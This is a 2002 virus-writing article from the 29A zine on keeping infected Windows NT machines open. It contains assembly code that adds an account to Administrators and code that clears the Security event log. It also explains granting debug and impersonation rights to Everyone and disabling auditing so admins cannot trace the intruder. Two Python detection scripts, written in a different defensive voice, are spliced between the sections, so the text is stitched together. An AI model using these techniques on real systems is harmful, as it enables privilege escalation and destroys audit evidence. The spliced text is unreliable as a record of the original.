
VX Heaven


Opening NT boxes for you and your comrades in arms

Ratter
29a [6]
March 2002


Intro

You have infected an NT box and you are running in the security context of a member of the Administrators group. Now you can do everything you want with the machine. How do you keep the machine open for you even when you log in as a normal user?

Adding to administrators group

Of course you can now add any account to the Administrators group. It's probably the easiest way to get full control of the machine every time your virus is run. However, this is not very "stealth", because even the stupidest admin worx with accounts and will almost certainly notice it.

Adding account to an administrators group

; APIs are exported by advapi32.dll and netapi32.dll

        domain_name_buffer              db      100 dup(?)
        sid_buffer                      db      30 dup(?)

        @pushvar <dd    ?>                      ; SID_type
        @pushvar <dd    100>                    ; domain_name_buffer size
        push offset domain_name_buffer          ; domain_name
        @pushvar <dd    30>                     ; sid_buffer size
        push offset sid_buffer                  ; on output - sid
        @pushsz "account"                       ; account name
        push 0                                  ; system name - null is local system
        calle LookupAccountNameA

        push 1                                  ; one entry
        @pushvar <dd    offset sid_buffer>      ; entry buffer
        push 0                                  ; entry type ...
        call $+5+15*2                           ; group name
        dw      "a", "d", "m", "i", "n", "i", "s", "t", "r", "a", "t", "o", "r", "s", 0
        push 0                                  ; local system
        calle NetLocalGroupAddMembers
 

Adding needed privileges for Impersonation/Debug mode

This approach is much more clever. I won't paste the code from TaiChi here because it's too extensive, so have a look at the add_privilegez function in the Win2k.TaiChi source. What does it do? First it gets the SID of the Everyone group and then adds both needed privileges to this group: SeTcbPrivilege for impersonation and SeDebugPrivilege for Win32 subsystem infection support.

You can of course combine both. If you use impersonation to achieve full control, don't forget to install a trojan or find another way to retrieve passwords. However, if you use only the Debug support, it's possibly a better idea to modify the Global Flags, because it's a little bit more "stealth" :) Or you can code an NT kernel mode driver which, on demand via IOCTL, modifies the NtGlobalFlag variable to let you infect the protected components.
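From the admin's side, the grants described above (Everyone holding SeTcbPrivilege or SeDebugPrivilege) are visible in the local security policy. The Python below is an added example, not code from this article or from Win2k.TaiChi: it parses the [Privilege Rights] section of a secedit /export /cfg style export and flags sensitive rights held by broad principals, plus any holder that an expected baseline does not list. The export text, the baseline and the SeLoadDriverPrivilege entry are constructed for the example.

```python
"""Flag risky user-right grants in a secedit-style policy export.

Added example, not code from the article or from Win2k.TaiChi.
`secedit /export /cfg <file>` writes an INI-like file whose
[Privilege Rights] section lists each right with the SIDs (prefixed
by '*') or account names that hold it. The export text and the
baseline below are constructed for this example.
"""
from __future__ import annotations

import configparser

# Well-known SIDs
ADMINISTRATORS_SID = "S-1-5-32-544"

# Principals that effectively mean "any account on the box"
BROAD_PRINCIPALS = {
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-32-545": "Users",
}

# The two rights the article hands to Everyone, plus driver loading
# (added here because the article also mentions a kernel-mode driver)
SENSITIVE_RIGHTS = {
    "SeTcbPrivilege": "act as part of the operating system (impersonation)",
    "SeDebugPrivilege": "debug programs (open any process)",
    "SeLoadDriverPrivilege": "load and unload device drivers",
}

# Constructed sample: Everyone has been given SeDebugPrivilege and SeTcbPrivilege
SAMPLE_EXPORT = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544,*S-1-1-0
SeTcbPrivilege = *S-1-1-0
SeLoadDriverPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
"""

# Constructed baseline of who should hold each sensitive right on this box
EXAMPLE_BASELINE = {
    "SeDebugPrivilege": {ADMINISTRATORS_SID},
    "SeTcbPrivilege": set(),
    "SeLoadDriverPrivilege": {ADMINISTRATORS_SID},
}


def parse_privilege_rights(export_text: str) -> dict[str, set[str]]:
    """Return {right: {holder SID or name, ...}} from the [Privilege Rights] section."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str  # keep the case of the privilege names
    parser.read_string(export_text)
    rights: dict[str, set[str]] = {}
    if not parser.has_section("Privilege Rights"):
        return rights
    for right, holders in parser.items("Privilege Rights"):
        # '*' marks a SID; plain account names are kept as written
        rights[right] = {h.strip().lstrip("*") for h in holders.split(",") if h.strip()}
    return rights


def find_broad_grants(rights: dict[str, set[str]]) -> list[tuple[str, str, str]]:
    """List (right, sid, principal name) where a sensitive right is held by a broad principal."""
    findings = []
    for right, holders in rights.items():
        if right not in SENSITIVE_RIGHTS:
            continue
        for sid in sorted(holders & set(BROAD_PRINCIPALS)):
            findings.append((right, sid, BROAD_PRINCIPALS[sid]))
    return findings


def unexpected_holders(rights: dict[str, set[str]], baseline: dict[str, set[str]]) -> dict[str, set[str]]:
    """Holders of each baselined right that the baseline does not list."""
    drift = {}
    for right, expected in baseline.items():
        extra = rights.get(right, set()) - expected
        if extra:
            drift[right] = extra
    return drift


if __name__ == "__main__":
    parsed = parse_privilege_rights(SAMPLE_EXPORT)
    for right, sid, name in find_broad_grants(parsed):
        print(f"[!] {right} held by {name} ({sid}): {SENSITIVE_RIGHTS[right]}")
    for right, extra in unexpected_holders(parsed, EXAMPLE_BASELINE).items():
        print(f"[!] {right} has unexpected holders: {', '.join(sorted(extra))}")
```

A real secedit export is written as UTF-16, so read the file with encoding="utf-16" before handing the text to parse_privilege_rights. Comparing against a baseline catches the quieter variant too, where a right is added to one extra account rather than to Everyone.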

Disabling auditing

If the admin is a good one, auditing is on, so the steps you did (adding privileges) got audited. It is good to disable auditing (see the disable_auditing function in TaiChi) so nothing gets logged ...

Clearing the security event log

This is the log where auditing messages are stored. After you disable auditing it's good to clear this log too. See the code snippet:

Clearing the security event log

; Used APIs are exported by advapi32.dll

        ...
        @pushsz "Security"
        pop esi
        call clear_event_log
        ...

clear_event_log proc    near
        pushad
        @SEH_SetupFrame <jmp clear_event_log_end>

        push esi
        push 0
        call dword ptr [ebp+tOpenEventLogA]
        test eax, eax
        jz clear_event_log_end
        xchg eax, ebx

        push 0
        push ebx
        call dword ptr [ebp+tClearEventLogA]

        push ebx
        call dword ptr [ebp+tCloseEventLog]
clear_event_log_end:
        @SEH_RemoveFrame
        popad
        retn
clear_event_log endp
 

Although the message "Event log cleared" will appear, it will hide your previous steps and make it harder for the admin to trace you. And of course this log can be cleared completely by using, for example, direct NTFS access.
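For the admin reading the Security log, each of the four steps in this article leaves a record, including the clear itself (the "Event log cleared" message mentioned above). The Python below is an added example, not code from the article: it takes already-parsed Security records (constructed dicts here, with field names of my own choosing) and flags member additions to Administrators, SeDebugPrivilege/SeTcbPrivilege grants to broad groups, audit policy changes and log clears, then reports when a privilege change is followed by a blinding or clearing step inside a time window. The event IDs are the classic NT 4/2000/XP numbers together with their Vista-and-later equivalents.

```python
"""Spot the admin-side traces of the steps in this article in Security log records.

Added example, not code from the article. Input is a list of already-parsed
Security records as dicts; the field names (time, id, subject, group, member,
rights, target_sid) are an assumed shape, and every record below is constructed.
Event IDs are the NT 4/2000/XP numbers alongside their Vista-and-later equivalents.
"""
from __future__ import annotations

from datetime import datetime, timedelta

SENSITIVE_RIGHTS = {"SeDebugPrivilege", "SeTcbPrivilege"}
BROAD_SIDS = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users", "S-1-5-32-545": "Users"}

GROUP_MEMBER_ADDED = {636, 4732}     # member added to a security-enabled local group
USER_RIGHT_ASSIGNED = {608, 4704}    # user right assigned
AUDIT_POLICY_CHANGED = {612, 4719}   # system audit policy changed
AUDIT_LOG_CLEARED = {517, 1102}      # audit log cleared (written after the clear)

# Constructed records mirroring the article's sequence on one machine
SAMPLE_EVENTS = [
    {"time": "2002-03-01T09:30:00", "id": 528, "subject": "WKS\\alice"},  # ordinary logon
    {"time": "2002-03-01T10:00:05", "id": 636, "subject": "WKS\\alice",
     "group": "Administrators", "member": "WKS\\guest"},
    {"time": "2002-03-01T10:00:07", "id": 608, "subject": "WKS\\alice",
     "rights": ["SeTcbPrivilege", "SeDebugPrivilege"], "target_sid": "S-1-1-0"},
    {"time": "2002-03-01T10:00:09", "id": 612, "subject": "WKS\\alice"},
    {"time": "2002-03-01T10:00:11", "id": 517, "subject": "WKS\\alice"},
]

# Constructed records with no privilege change: a routine right and a lone log clear
BENIGN_EVENTS = [
    {"time": "2002-03-02T08:00:00", "id": 4704, "subject": "WKS\\bob",
     "rights": ["SeShutdownPrivilege"], "target_sid": "S-1-5-32-545"},
    {"time": "2002-03-02T17:45:00", "id": 1102, "subject": "WKS\\bob"},
]


def classify(ev: dict) -> tuple[str, str] | None:
    """Map one record to (stage, description); None when it is not one of the four steps."""
    eid = ev["id"]
    if eid in GROUP_MEMBER_ADDED and ev.get("group", "").lower() == "administrators":
        return "escalate", f"{ev['member']} added to Administrators by {ev['subject']}"
    if eid in USER_RIGHT_ASSIGNED:
        granted = SENSITIVE_RIGHTS & set(ev.get("rights", ()))
        target = ev.get("target_sid", "")
        if granted and target in BROAD_SIDS:
            names = ", ".join(sorted(granted))
            return "escalate", f"{names} granted to {BROAD_SIDS[target]} by {ev['subject']}"
    if eid in AUDIT_POLICY_CHANGED:
        return "blind", f"audit policy changed by {ev['subject']}"
    if eid in AUDIT_LOG_CLEARED:
        return "cover", f"Security log cleared by {ev['subject']}"
    return None


def find_tamper_chain(events, window=timedelta(minutes=30)):
    """Return (findings, chain): findings are (time, stage, text) in time order, and
    chain is True when a blind/cover step follows an escalate step within the window."""
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        hit = classify(ev)
        if hit is not None:
            findings.append((datetime.fromisoformat(ev["time"]), *hit))
    escalations = [ts for ts, stage, _ in findings if stage == "escalate"]
    chain = any(
        stage in ("blind", "cover") and any(timedelta(0) <= ts - e <= window for e in escalations)
        for ts, stage, _ in findings
    )
    return findings, chain


if __name__ == "__main__":
    for label, batch in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        findings, chain = find_tamper_chain(batch)
        print(f"== {label}: chain={'YES' if chain else 'no'}")
        for ts, stage, text in findings:
            print(f"  {ts:%H:%M:%S} [{stage}] {text}")
```

The correlation only works if the records survive, which is exactly what the clear is meant to prevent; that is why the practical mitigation is forwarding Security events to a collector the local administrator cannot clear, so the "cover" record still arrives together with the "escalate" and "blind" ones that preceded it.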

Closing

If you take these steps the NT box is opened for everyone. Once logged in you can do what you want. Even if you don't plan to write NT viruses, at least add to your babes code for adding SeDebugPrivilege to Everyone. That makes it easier for other viruses to infect the machine - remember your fellow coders too :)))

Ratter/29A - I'm a stranger in the world I haven't made